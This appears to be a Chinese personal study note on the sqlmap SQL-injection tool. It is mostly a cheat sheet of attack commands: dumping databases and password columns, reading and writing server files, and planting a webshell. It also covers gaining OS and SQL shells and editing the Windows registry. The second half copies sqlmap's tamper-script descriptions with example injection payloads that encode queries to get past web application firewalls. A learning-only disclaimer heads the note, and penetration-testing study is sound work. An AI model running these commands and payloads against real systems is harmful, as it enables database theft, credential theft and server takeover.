学习笔记-Sqlmap
Sqlmap
免责声明
本文档仅供学习和研究使用,请勿使用文中的技术源码用于非法用途,任何人造成的任何负面影响,与本人无关.
项目地址
文章 & Reference
基础使用
检测注入
sqlmap -u URL -v 3 --random-agent # 判断注入
sqlmap -u URL -p id # 指定参数注入
sqlmap -u URL --cookie="xxxxx" # 带 cookie 注入
sqlmap -u URL --batch # 不要请求用户输入,使用默认行为
sqlmap -r aaa.txt # post 型注入
sqlmap -u URL --flush-session # 清除缓存
sqlmap -u URL --os "Windows" # 指定操作系统
sqlmap -u URL --dbms mysql --level 3 # 指定数据库类型为 mysql,级别为 3(共 5 级,级别越高,检测越全面)
sqlmap -u URL --dbms Microsoft SQL Server
sqlmap -u URL --dbms mysql --risk 3 # 指定执行测试的风险(1-3, 默认 1) 1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加 OR 语句的 SQL 注入测试
sqlmap -u URL --proxy "socks5://127.0.0.1:1080" # 代理注入测试
sqlmap -u URL --batch --smart # 启发式判断注入
获取信息
sqlmap -u URL --current-db # 获取当前数据库
sqlmap -u URL --dbs # 枚举所有数据库
sqlmap -u URL -f # 检查 DBMS 版本
sqlmap -u URL --is-dba # 判断当前用户是否是 dba
sqlmap -u URL --users # 列出数据库管理系统用户
sqlmap -u URL --privileges # 枚举 DBMS 用户权限
sqlmap -u URL --passwords # 获取当前数据库密码
sqlmap -u URL -D DATABASE --tables # 获取数据库表
sqlmap -u URL -D DATABASE -T TABLES --columns # 获取指定表的列名
sqlmap -u URL -D DATABASE -T TABLES -C COLUMNS --dump # 获取指定表的列名
sqlmap -u URL -dbms mysql -level 3 -D test -T admin -C "username,password" -dump # dump 出字段 username 与 password 中的数据
sqlmap -u URL --dump-all # 列出所有数据库,所有表内容
搜索字段
sqlmap -r "c:\tools\request.txt" -dbms mysql -D dedecms --search -C admin,password # 在 dedecms 数据库中搜索字段 admin 或者 password.
读取与写入文件
首先找需要网站的物理路径,其次需要有可写或可读权限.
- -file-read=RFILE 从后端的数据库管理系统文件系统读取文件 (物理路径)
- -file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 (mssql xp_shell)
- -file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径
sqlmap -r aaa.txt --file-dest "e:\php\htdocs\dvwa\inc\include\1.php" --file-write "f:\webshell\1112.php"
# 注 : mysql 不支持列目录,仅支持读取单个文件.sqlserver 可以列目录,不能读写文件,但需要一个 xp_dirtree 函数
提权
sqlmap -u URL --sql-shell # 获取一个 sql-shell 会话
sqlmap -u URL --os-shell # 获取一个 os-shell 会话
sqlmap -u URL --os-cmd=ipconfig # 在注入点直接执行命令
sqlmap -d "mssql://sa:sql123456@ip:1433/master" --os-shell # 知道数据库密码后提权成为交互式系统shell
对 Windows 注册表操作
--reg-read # 读取注册表值
--reg-add # 写入注册表值
--reg-del # 删除注册表值
--reg-key,--reg-value,--reg-data,--reg-type # 注册表辅助选项
sqlmap -u URL --reg-add --reg-key="HKEY_LOCAL_MACHINE\SOFTWARE\sqlmap" --reg-value=Test --reg-type=REG_SZ --reg-data=1
预估完成时间
--eta # 计算注入数据的剩余时间
测试 WAF/IPS/IDS 保护
--identify-waf # 尝试找出WAF/IPS/IDS保护,方便用户做出绕过方式。
--mobile # 模仿智能手机
--referer "http://www.google.com" # 模拟来源
--user-agent "Googlebot/2.1(+http://www.googlebot.com/bot.html)" # 模拟谷歌蜘蛛
--skip-waf
尝试 getshell
sqlmap -d "mysql://root:root@192.168.1.1:3306/mysql" --os-shell
宽字节检测
sqlmap -u URL --dbms mysql --prefix "%df%27" --technique U -v 3 # 宽字节检测
union 语句测试
--union-cols=UCOLS 测试UNION查询的SQL注入的列的范围
--union-char=UCHAR 用来破解列数的字符
--union-from=UFROM 在UNION查询的FROM部分中使用的表
tamper
用法
python sqlmap.py -u http://xx.xxx.xx.xx?id=1 --tamper xxx.py
相关文章
0eunion.py
Replaces instances of
UNION with e0UNION
使用 e0UNION 替换 UNION
Requirement:
- MySQL
- MsSQL
Notes:
>>> tamper('1 UNION ALL SELECT')
'1e0UNION ALL SELECT'
apostrophemask.py
Replaces apostrophe character (') with its UTF-8 full width counterpart (e.g. ' -> %EF%BC%87)
将 ' 替换成 UTF-8 urlencoded 的 %EF%BC%87
References:
- http://www.utf8-chartable.de/unicode-utf8-table.pl?start=65280&number=128
- https://web.archive.org/web/20130614183121/http://lukasz.pilorz.net/testy/unicode_conversion/
- https://web.archive.org/web/20131121094431/sla.ckers.org/forum/read.php?13,11562,11850
- https://web.archive.org/web/20070624194958/http://lukasz.pilorz.net/testy/full_width_utf/index.phps
>>> tamper("1 AND '1'='1")
'1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
apostrophenullencode.py
Replaces apostrophe character (') with its illegal double unicode counterpart (e.g. ' -> %00%27)
将 ' 替换成 %00%27
>>> tamper("1 AND '1'='1")
'1 AND %00%271%00%27=%00%271'
appendnullbyte.py
Appends (Access) NULL byte character (%00) at the end of payload
在参数末尾加入 %00
Requirement:
- Microsoft Access
Reference
>>> tamper('1 AND 1=1')
'1 AND 1=1%00'
base64encode.py
Base64-encodes all characters in a given payload
base64 编码所有字符
>>> tamper("1' AND SLEEP(5)#")
'MScgQU5EIFNMRUVQKDUpIw=='
between.py
Replaces greater than operator ('>') with 'NOT BETWEEN 0 AND #' and equals operator ('=') with 'BETWEEN # AND #'
将 > 字符替换为 NOT BETWEEN 0 AND
将 = 字符替换为 BETWEEN # AND #
>>> tamper('1 AND A > B--')
'1 AND A NOT BETWEEN 0 AND B--'
>>> tamper('1 AND A = B--')
'1 AND A BETWEEN B AND B--'
>>> tamper('1 AND LAST_INSERT_ROWID()=LAST_INSERT_ROWID()')
'1 AND LAST_INSERT_ROWID() BETWEEN LAST_INSERT_ROWID() AND LAST_INSERT_ROWID()'
binary.py
Injects keyword binary where possible
Requirement:
- MySQL
>>> tamper('1 UNION ALL SELECT NULL, NULL, NULL')
'1 UNION ALL SELECT binary NULL, binary NULL, binary NULL'
>>> tamper('1 AND 2>1')
'1 AND binary 2>binary 1'
>>> tamper('CASE WHEN (1=1) THEN 1 ELSE 0x28 END')
'CASE WHEN (binary 1=binary 1) THEN binary 1 ELSE binary 0x28 END'
bluecoat.py
Replaces space character after SQL statement with a valid random blank character. Afterwards replace character '=' with operator LIKE
将 sql 语句后的空格字符替换为 %09,LIKE 替换字符 =
Requirement:
- Blue Coat SGOS with WAF activated as documented in https://kb.bluecoat.com/index?page=content&id=FAQ2147
Tested against:
- MySQL 5.1, SGOS
>>> tamper('SELECT id FROM users WHERE id = 1')
'SELECT%09id FROM%09users WHERE%09id LIKE 1'
chardoubleencode.py
Double URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %2553%2545%254C%2545%2543%2554)
二次URL编码
>>> tamper('SELECT FIELD FROM%20TABLE')
'%2553%2545%254C%2545%2543%2554%2520%2546%2549%2545%254C%2544%2520%2546%2552%254F%254D%2520%2554%2541%2542%254C%2545'
charencode.py
URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %53%45%4C%45%43%54)
URL编码
Tested against:
- Microsoft SQL Server 2005
- MySQL 4, 5.0 and 5.5
- Oracle 10g
- PostgreSQL 8.3, 8.4, 9.0
>>> tamper('SELECT FIELD FROM%20TABLE')
'%53%45%4C%45%43%54%20%46%49%45%4C%44%20%46%52%4F%4D%20%54%41%42%4C%45'
charunicodeencode.py
Unicode-URL-encodes all characters in a given payload (not processing already encoded) (e.g. SELECT -> %u0053%u0045%u004C%u0045%u0043%u0054)
URL编码
Requirement:
- ASP
- ASP.NET
Tested against:
- Microsoft SQL Server 2000
- Microsoft SQL Server 2005
- MySQL 5.1.56
- PostgreSQL 9.0.3
>>> tamper('SELECT FIELD%20FROM TABLE')
'%u0053%u0045%u004C%u0045%u0043%u0054%u0020%u0046%u0049%u0045%u004C%u0044%u0020%u0046%u0052%u004F%u004D%u0020%u0054%u0041%u0042%u004C%u0045'
charunicodeescape.py
Unicode-escapes non-encoded characters in a given payload (not processing already encoded) (e.g. SELECT -> \u0053\u0045\u004C\u0045\u0043\u0054)
url 解码中的 % 换成 \\
>>> tamper('SELECT FIELD FROM TABLE')
'\\\\u0053\\\\u0045\\\\u004C\\\\u0045\\\\u0043\\\\u0054\\\\u0020\\\\u0046\\\\u0049\\\\u0045\\\\u004C\\\\u0044\\\\u0020\\\\u0046\\\\u0052\\\\u004F\\\\u004D\\\\u0020\\\\u0054\\\\u0041\\\\u0042\\\\u004C\\\\u0045'
commalesslimit.py
Replaces (MySQL) instances like 'LIMIT M, N' with 'LIMIT N OFFSET M' counterpart
替换字符的位置
Requirement:
- MySQL
Tested against:
- MySQL 5.0 and 5.5
>>> tamper('LIMIT 2, 3')
'LIMIT 3 OFFSET 2'
commalessmid.py
Replaces (MySQL) instances like 'MID(A, B, C)' with 'MID(A FROM B FOR C)' counterpart
用 'MID(A FROM B FOR C)' 代替 'MID(A, B, C)'
Requirement:
- MySQL
Tested against:
- MySQL 5.0 and 5.5
>>> tamper('MID(VERSION(), 1, 1)')
'MID(VERSION() FROM 1 FOR 1)'
commentbeforeparentheses.py
Prepends (inline) comment before parentheses (e.g. ( -> /**/()
在括号前添加内联注释
Tested against:
- Microsoft SQL Server
- MySQL
- Oracle
- PostgreSQL
>>> tamper('SELECT ABS(1)')
'SELECT ABS/**/(1)'
concat2concatws.py
Replaces (MySQL) instances like 'CONCAT(A, B)' with 'CONCAT_WS(MID(CHAR(0), 0, 0), A, B)' counterpart
将 concat(a,b) 替换成 concat_ws(mid(char(0),0,0),a,b)
Requirement:
- MySQL
Tested against:
- MySQL 5.0
>>> tamper('CONCAT(1,2)')
'CONCAT_WS(MID(CHAR(0),0,0),1,2)'
"""
dunion.py
Replaces instances of
UNION with DUNION
将 UNION 换成 DUNION
Requirement:
- Oracle
Reference
>>> tamper('1 UNION ALL SELECT')
'1DUNION ALL SELECT'
equaltolike.py
Replaces all occurrences of operator equal ('=') with 'LIKE' counterpart
将 = 换成 LIKE
Tested against:
- Microsoft SQL Server 2005
- MySQL 4, 5.0 and 5.5
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id LIKE 1'
equaltorlike.py
Replaces all occurrences of operator equal ('=') with 'RLIKE' counterpart
将 = 换成 RLIKE
Tested against:
- MySQL 4, 5.0 and 5.5
>>> tamper('SELECT * FROM users WHERE id=1')
'SELECT * FROM users WHERE id RLIKE 1'
escapequotes.py
Slash escape single and double quotes (e.g. ' -> ')
>>> tamper('1" AND SLEEP(5)#')
'1\\\\" AND SLEEP(5)#'
greatest.py
Replaces greater than operator ('>') with 'GREATEST' counterpart
使用 greatest 替换 >
Tested against:
- MySQL 4, 5.0 and 5.5
- Oracle 10g
- PostgreSQL 8.3, 8.4, 9.0
>>> tamper('1 AND A > B')
'1 AND GREATEST(A,B+1)=A'
halfversionedmorekeywords.py
Adds (MySQL) versioned comment before each keyword
在每个关键词前添加(MySQL)的版本注释
Requirement:
- MySQL < 5.1
Tested against:
- MySQL 4.0.18, 5.0.22
>>> tamper("value' UNION ALL SELECT CONCAT(CHAR(58,107,112,113,58),IFNULL(CAST(CURRENT_USER() AS CHAR),CHAR(32)),CHAR(58,97,110,121,58)), NULL, NULL# AND 'QDWa'='QDWa")
"value'/*!0UNION/*!0ALL/*!0SELECT/*!0CONCAT(/*!0CHAR(58,107,112,113,58),/*!0IFNULL(CAST(/*!0CURRENT_USER()/*!0AS/*!0CHAR),/*!0CHAR(32)),/*!0CHAR(58,97,110,121,58)),/*!0NULL,/*!0NULL#/*!0AND 'QDWa'='QDWa"
hex2char.py
Replaces each (MySQL) 0x
encoded string with equivalent CONCAT(CHAR(),...) counterpart
用对应的 CONCAT(CHAR(),...) 替换每个 (MySQL)0x
Requirement:
- MySQL
Tested against:
- MySQL 4, 5.0 and 5.5
>>> tamper('SELECT 0xdeadbeef')
'SELECT CONCAT(CHAR(222),CHAR(173),CHAR(190),CHAR(239))'
htmlencode.py
HTML encode (using code points) all non-alphanumeric characters (e.g. ' -> ')
HTML编码(使用代码点)所有非字母数字字符(例如,'-> ')。
>>> tamper("1' AND SLEEP(5)#")
'1' AND SLEEP(5)#'
ifnull2casewhenisnull.py
Replaces instances like 'IFNULL(A, B)' with 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' counterpart
用 'CASE WHEN ISNULL(A) THEN (B) ELSE (A) END' 代替 'IFNULL(A, B)' 这样的实例。
Requirement:
- MySQL
- SQLite (possibly)
- SAP MaxDB (possibly)
Tested against:
- MySQL 5.0 and 5.5
>>> tamper('IFNULL(1, 2)')
'CASE WHEN ISNULL(1) THEN (2) ELSE (1) END'
ifnull2ifisnull.py
Replaces instances like 'IFNULL(A, B)' with 'IF(ISNULL(A), B, A)' counterpart
用 IF(ISNULL(A), B, A) 代替 IFNULL(A, B) 这样的实例。
Requirement:
- MySQL
- SQLite (possibly)
- SAP MaxDB (possibly)
Tested against:
- MySQL 5.0 and 5.5
>>> tamper('IFNULL(1, 2)')
'IF(ISNULL(1),2,1)'
informationschemacomment.py
Add an inline comment (/**/) to the end of all occurrences of (MySQL) "information_schema" identifier
在所有出现的(MySQL)"information_schema" 标识符的末尾添加一个内联注释(/**/)。
>>> tamper('SELECT table_name FROM INFORMATION_SCHEMA.TABLES')
'SELECT table_name FROM INFORMATION_SCHEMA/**/.TABLES'
least.py
Replaces greater than operator ('>') with 'LEAST' counterpart
用 LEAST 代替大于运算符(>)。
Tested against:
- MySQL 4, 5.0 and 5.5
- Oracle 10g
- PostgreSQL 8.3, 8.4, 9.0
>>> tamper('1 AND A > B')
'1 AND LEAST(A,B+1)=B+1'
lowercase.py
Replaces each keyword character with lower case value (e.g. SELECT -> select)
用小写字母值替换每个关键词字符(例如:SELECT -> select)。
Tested against:
- Microsoft SQL Server 2005
- MySQL 4, 5.0 and 5.5
- Oracle 10g
- PostgreSQL 8.3, 8.4, 9.0
>>> tamper('INSERT')
'insert'
luanginx.py
LUA-Nginx WAFs Bypass (e.g. Cloudflare)
Reference:
>>> random.seed(0); hints={}; payload = tamper("1 AND 2>1", hints=hints); "%s&%s" % (hints[HINT.PREPEND], payload)
'34=&Xe=&90=&Ni=&rW=&lc=&te=&T4=&zO=&NY=&B4=&hM=&X2=&pU=&D8=&hm=&p0=&7y=&18=&RK=&Xi=&5M=&vM=&hO=&bg=&5c=&b8=&dE=&7I=&5I=&90=&R2=&BK=&bY=&p4=&lu=&po=&Vq=&bY=&3c=&ps=&Xu=&lK=&3Q=&7s=&pq=&1E=&rM=&FG=&vG=&Xy=&tQ=&lm=&rO=&pO=&rO=&1M=&vy=&La=&xW=&f8=&du=&94=&vE=&9q=&bE=&lQ=&JS=&NQ=&fE=&RO=&FI=&zm=&5A=&lE=&DK=&x8=&RQ=&Xw=&LY=&5S=&zi=&Js=&la=&3I=&r8=&re=&Xe=&5A=&3w=&vs=&zQ=&1Q=&HW=&Bw=&Xk=&LU=&Lk=&1E=&Nw=&pm=&ns=&zO=&xq=&7k=&v4=&F6=&Pi=&vo=&zY=&vk=&3w=&tU=&nW=&TG=&NM=&9U=&p4=&9A=&T8=&Xu=&xa=&Jk=&nq=&La=&lo=&zW=&xS=&v0=&Z4=&vi=&Pu=&jK=&DE=&72=&fU=&DW=&1g=&RU=&Hi=&li=&R8=&dC=&nI=&9A=&tq=&1w=&7u=&rg=&pa=&7c=&zk=&rO=&xy=&ZA=&1K=&ha=&tE=&RC=&3m=&r2=&Vc=&B6=&9A=&Pk=&Pi=&zy=&lI=&pu=&re=&vS=&zk=&RE=&xS=&Fs=&x8=&Fe=&rk=&Fi=&Tm=&fA=&Zu=&DS=&No=&lm=&lu=&li=&jC=&Do=&Tw=&xo=&zQ=&nO=&ng=&nC=&PS=&fU=&Lc=&Za=&Ta=&1y=&lw=&pA=&ZW=&nw=&pM=&pa=&Rk=&lE=&5c=&T4=&Vs=&7W=&Jm=&xG=&nC=&Js=&xM=&Rg=&zC=&Dq=&VA=&Vy=&9o=&7o=&Fk=&Ta=&Fq=&9y=&vq=&rW=&X4=&1W=&hI=&nA=&hs=&He=&No=&vy=&9C=&ZU=&t6=&1U=&1Q=&Do=&bk=&7G=&nA=&VE=&F0=&BO=&l2=&BO=&7o=&zq=&B4=&fA=&lI=&Xy=&Ji=&lk=&7M=&JG=&Be=&ts=&36=&tW=&fG=&T4=&vM=&hG=&tO=&VO=&9m=&Rm=&LA=&5K=&FY=&HW=&7Q=&t0=&3I=&Du=&Xc=&BS=&N0=&x4=&fq=&jI=&Ze=&TQ=&5i=&T2=&FQ=&VI=&Te=&Hq=&fw=&LI=&Xq=&LC=&B0=&h6=&TY=&HG=&Hw=&dK=&ru=&3k=&JQ=&5g=&9s=&HQ=&vY=&1S=&ta=&bq=&1u=&9i=&DM=&DA=&TG=&vQ=&Nu=&RK=&da=&56=&nm=&vE=&Fg=&jY=&t0=&DG=&9o=&PE=&da=&D4=&VE=&po=&nm=&lW=&X0=&BY=&NK=&pY=&5Q=&jw=&r0=&FM=&lU=&da=&ls=&Lg=&D8=&B8=&FW=&3M=&zy=&ho=&Dc=&HW=&7E=&bM=&Re=&jk=&Xe=&JC=&vs=&Ny=&D4=&fA=&DM=&1o=&9w=&3C=&Rw=&Vc=&Ro=&PK=&rw=&Re=&54=&xK=&VK=&1O=&1U=&vg=&Ls=&xq=&NA=&zU=&di=&BS=&pK=&bW=&Vq=&BC=&l6=&34=&PE=&JG=&TA=&NU=&hi=&T0=&Rs=&fw=&FQ=&NQ=&Dq=&Dm=&1w=&PC=&j2=&r6=&re=&t2=&Ry=&h2=&9m=&nw=&X4=&vI=&rY=&1K=&7m=&7g=&J8=&Pm=&RO=&7A=&fO=&1w=&1g=&7U=&7Y=&hQ=&FC=&vu=&Lw=&5I=&t0=&Na=&vk=&Te=&5S=&ZM=&Xs=&Vg=&tE=&J2=&Ts=&Dm=&Ry=&FC=&7i=&h8=&3y=&zk=&5G=&NC=&Pq=&ds=&zK=&d8=&zU=&1a=&d8=&Js=&nk=&TQ=&tC=&n8=&Hc=&Ru=&H0=&Bo=&XE=&Jm=&xK=&r2=&Fu=&FO=&NO=&7g=&PC=&Bq=&3O=&FQ=&1o=&5G=&zS=&Ps=&j0=&b0=&RM=&DQ=&RQ=&zY=&nk=&1 AND 2>1'
misunion.py
Replaces instances of UNION with -.1UNION
UNION 修改为 -.1UNION
Requirement:
- MySQL
Reference
>>> tamper('1 UNION ALL SELECT')
'1-.1UNION ALL SELECT'
>>> tamper('1" UNION ALL SELECT')
'1"-.1UNION ALL SELECT'
modsecurityversioned.py
Embraces complete query with (MySQL) versioned comment
Requirement:
- MySQL
Tested against:
- MySQL 5.0
>>> import random
>>> random.seed(0)
>>> tamper('1 AND 2>1--')
'1 /*!30963AND 2>1*/--'
modsecurityzeroversioned.py
Embraces complete query with (MySQL) zero-versioned comment
Requirement:
- MySQL
Tested against:
- MySQL 5.0
>>> tamper('1 AND 2>1--')
'1 /*!00000AND 2>1*/--'
multiplespaces.py
Adds multiple spaces (' ') around SQL keywords
在sql关键字周围添加多个空格
Reference
>>> random.seed(0)
>>> tamper('1 UNION SELECT foobar')
'1 UNION SELECT foobar'
overlongutf8.py
Converts all (non-alphanum) characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. ' -> %C0%A7)
将给定的有效载荷中的所有(非字母)字符转换为超长 UTF8(不处理已经编码的)(例如 ' -> %C0%A7)
Reference:
- https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
- https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'SELECT%C0%A0FIELD%C0%A0FROM%C0%A0TABLE%C0%A0WHERE%C0%A02%C0%BE1'
overlongutf8more.py
Converts all characters in a given payload to overlong UTF8 (not processing already encoded) (e.g. SELECT -> %C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94)
Reference:
- https://www.acunetix.com/vulnerabilities/unicode-transformation-issues/
- https://www.thecodingforums.com/threads/newbie-question-about-character-encoding-what-does-0xc0-0x8a-have-in-common-with-0xe0-0x80-0x8a.170201/
>>> tamper('SELECT FIELD FROM TABLE WHERE 2>1')
'%C1%93%C1%85%C1%8C%C1%85%C1%83%C1%94%C0%A0%C1%86%C1%89%C1%85%C1%8C%C1%84%C0%A0%C1%86%C1%92%C1%8F%C1%8D%C0%A0%C1%94%C1%81%C1%82%C1%8C%C1%85%C0%A0%C1%97%C1%88%C1%85%C1%92%C1%85%C0%A0%C0%B2%C0%BE%C0%B1'
percentage.py
Adds a percentage sign ('%') infront of each character (e.g. SELECT -> %S%E%L%E%C%T)
在每一个字符前面添加一个百分比符号
Requirement:
- ASP
Tested against:
- Microsoft SQL Server 2000, 2005
- MySQL 5.1.56, 5.5.11
- PostgreSQL 9.0
>>> tamper('SELECT FIELD FROM TABLE')
'%S%E%L%E%C%T %F%I%E%L%D %F%R%O%M %T%A%B%L%E'
plus2concat.py
Replaces plus operator ('+') with (MsSQL) function CONCAT() counterpart
用对应的 (MsSQL) 函数 CONCAT() 代替加号运算符('+')。
Tested against:
- Microsoft SQL Server 2012
Requirements:
- Microsoft SQL Server 2012+
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT CONCAT(CHAR(113),CHAR(114),CHAR(115)) FROM DUAL'
>>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
'1 UNION ALL SELECT NULL,NULL,CONCAT(CHAR(113),CHAR(118),CHAR(112),CHAR(112),CHAR(113),ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)),CHAR(113),CHAR(112),CHAR(107),CHAR(112),CHAR(113))-- qtfe'
plus2fnconcat.py
Replaces plus operator ('+') with (MsSQL) ODBC function {fn CONCAT()} counterpart
Tested against:
- Microsoft SQL Server 2008
Requirements:
- Microsoft SQL Server 2008+
Notes:
- Useful in case ('+') character is filtered
- https://msdn.microsoft.com/en-us/library/bb630290.aspx
>>> tamper('SELECT CHAR(113)+CHAR(114)+CHAR(115) FROM DUAL')
'SELECT {fn CONCAT({fn CONCAT(CHAR(113),CHAR(114))},CHAR(115))} FROM DUAL'
>>> tamper('1 UNION ALL SELECT NULL,NULL,CHAR(113)+CHAR(118)+CHAR(112)+CHAR(112)+CHAR(113)+ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32))+CHAR(113)+CHAR(112)+CHAR(107)+CHAR(112)+CHAR(113)-- qtfe')
'1 UNION ALL SELECT NULL,NULL,{fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT({fn CONCAT(CHAR(113),CHAR(118))},CHAR(112))},CHAR(112))},CHAR(113))},ISNULL(CAST(@@VERSION AS NVARCHAR(4000)),CHAR(32)))},CHAR(113))},CHAR(112))},CHAR(107))},CHAR(112))},CHAR(113))}-- qtfe'
randomcase.py
Replaces each keyword character with random case value (e.g. SELECT -> SEleCt)
字符替换成大小写字符
Tested against:
- Microsoft SQL Server 2005
- MySQL 4, 5.0 and 5.5
- Oracle 10g
- PostgreSQL 8.3, 8.4, 9.0
- SQLite 3
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'InSeRt'
>>> tamper('f()')
'f()'
>>> tamper('function()')
'FuNcTiOn()'
>>> tamper('SELECT id FROM `user`')
'SeLeCt id FrOm `user`'
randomcomments.py
Add random inline comments inside SQL keywords (e.g. SELECT -> S//E//LECT)
在关键字添加内联注释 //
>>> import random
>>> random.seed(0)
>>> tamper('INSERT')
'I/**/NS/**/ERT'
schemasplit.py
Splits FROM schema identifiers (e.g. 'testdb.users') with whitespace (e.g. 'testdb 9.e.users')
将 FROM 模式标识符(如 testdb.users )与空白处分割(如 testdb 9.e.users )。
Requirement:
- MySQL
Reference:
>>> tamper('SELECT id FROM testdb.users')
'SELECT id FROM testdb 9.e.users'
sleep2getlock.py
Replaces instances like 'SLEEP(5)' with (e.g.) "GET_LOCK('ETgP',5)"
用 GET_LOCK('ETgP',5) 取代 SLEEP(5)
Requirement:
- MySQL
Tested against:
- MySQL 5.0 and 5.5
Reference:
>>> tamper('SLEEP(5)') == "GET_LOCK('%s',5)" % kb.aliasName
True
sp_password.py
Appends (MsSQL) function 'sp_password' to the end of the payload for automatic obfuscation from DBMS logs
将 sp_password 附加到有效负载的末尾,用来混淆
Requirement:
- MSSQL
Reference:
>>> tamper('1 AND 9227=9227-- ')
'1 AND 9227=9227-- sp_password'
space2comment.py
Replaces space character (' ') with comments '/**/'
空格替换成//
Tested against:
- Microsoft SQL Server 2005
- MySQL 4, 5.0 and 5.5
- Oracle 10g
- PostgreSQL 8.3, 8.4, 9.0
>>> tamper('SELECT id FROM users')
'SELECT/**/id/**/FROM/**/users'
space2dash.py
Replaces space character (' ') with a dash comment ('--') followed by a random string and a new line ('\n')
用一个注释('--')代替空格字符(''),后面是一个随机字符串和一个新行('/n')。
Requirement:
- MSSQL
- SQLite
Reference:
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1--upgPydUzKpMX%0AAND--RcDKhIr%0A9227=9227'
space2hash.py
Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
用('#')字符替换(MySQL)空格字符('')的实例,后面是一个随机字符串和一个新行('/n')。
Requirement:
- MySQL
Tested against:
- MySQL 4.0, 5.0
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23upgPydUzKpMX%0AAND%23RcDKhIr%0A9227=9227'
space2morecomment.py
Replaces (MySQL) instances of space character (' ') with comments '/_/'
空格替换成/ /
Tested against:
- MySQL 5.0 and 5.5
>>> tamper('SELECT id FROM users')
'SELECT/**_**/id/**_**/FROM/**_**/users'
space2morehash.py
Replaces (MySQL) instances of space character (' ') with a pound character ('#') followed by a random string and a new line ('\n')
用('#')字符替换(MySQL)空格字符('')的实例,后面是一个随机字符串和一个新行('/n')。
Requirement:
- MySQL >= 5.1.13
Tested against:
- MySQL 5.1.41
>>> random.seed(0)
>>> tamper('1 AND 9227=9227')
'1%23RcDKhIr%0AAND%23upgPydUzKpMX%0A%23lgbaxYjWJ%0A9227=9227'
space2mssqlblank.py
Replaces (MsSQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
将(MsSQL)空格字符('')的实例替换为一个有效的备用字符集中的随机空白字符。
Requirement:
- Microsoft SQL Server
Tested against:
- Microsoft SQL Server 2000
- Microsoft SQL Server 2005
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0DFROM%04users'
space2mssqlhash.py
Replaces space character (' ') with a pound character ('#') followed by a new line ('\n')
将空格替换成 %23%0A
Requirement:
- MSSQL
- MySQL
>>> tamper('1 AND 9227=9227')
'1%23%0AAND%23%0A9227=9227'
space2mysqlblank.py
Replaces (MySQL) instances of space character (' ') with a random blank character from a valid set of alternate characters
将(MySQL)空格字符('')的实例替换为有效替代字符集中的随机空白字符
Requirement:
- MySQL
Tested against:
- MySQL 5.1
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%A0id%0CFROM%0Dusers'
space2mysqldash.py
Replaces space character (' ') with a dash comment ('--') followed by a new line ('\n')
用注释('--')代替空格字符(''),后面是一个新行('/n')。
Requirement:
- MySQL
- MSSQL
>>> tamper('1 AND 9227=9227')
'1--%0AAND--%0A9227=9227'
space2plus.py
Replaces space character (' ') with plus ('+')
将空格替换成 +
>>> tamper('SELECT id FROM users')
'SELECT+id+FROM+users'
space2randomblank.py
Replaces space character (' ') with a random blank character from a valid set of alternate characters
用一组有效的备用字符中的随机空白字符替换空格字符('')。
Tested against:
- Microsoft SQL Server 2005
- MySQL 4, 5.0 and 5.5
- Oracle 10g
- PostgreSQL 8.3, 8.4, 9.0
>>> random.seed(0)
>>> tamper('SELECT id FROM users')
'SELECT%0Did%0CFROM%0Ausers'
substring2leftright.py
Replaces PostgreSQL SUBSTRING with LEFT and RIGHT
用 LEFT 和 RIGHT 取代 PostgreSQL 的 SUBSTRING
Tested against:
- PostgreSQL 9.6.12
>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 1 FOR 1)')
'LEFT((SELECT usename FROM pg_user)::text,1)'
>>> tamper('SUBSTRING((SELECT usename FROM pg_user)::text FROM 3 FOR 1)')
'LEFT(RIGHT((SELECT usename FROM pg_user)::text,-2),1)'
symboliclogical.py
Replaces AND and OR logical operators with their symbolic counterparts (&& and ||)
将 and 和 or 的逻辑运算符分别替换为 (&& 和 ||)
>>> tamper("1 AND '1'='1")
"1 %26%26 '1'='1"
unionalltonnion.py
Replaces instances of UNION ALL SELECT with UNION SELECT counterpart
将 union all select 替换成 union select
>>> tamper('-1 UNION ALL SELECT')
'-1 UNION SELECT'
unmagicquotes.py
Replaces quote character (') with a multi-byte combo %BF%27 together with generic comment at the end (to make it work)
用多字节组合 %BF%27 代替引号字符('),并在结尾处加上通用注释(以使其发挥作用)
Reference:
>>> tamper("1' AND 1=1")
'1%bf%27-- -'
uppercase.py
Replaces each keyword character with upper case value (e.g. select -> SELECT)
将关键字符替换成大写
Tested against:
- Microsoft SQL Server 2005
- MySQL 4, 5.0 and 5.5
- Oracle 10g
- PostgreSQL 8.3, 8.4, 9.0
>>> tamper('insert')
'INSERT'
varnish.py
Appends a HTTP header 'X-originating-IP' to bypass Varnish Firewall
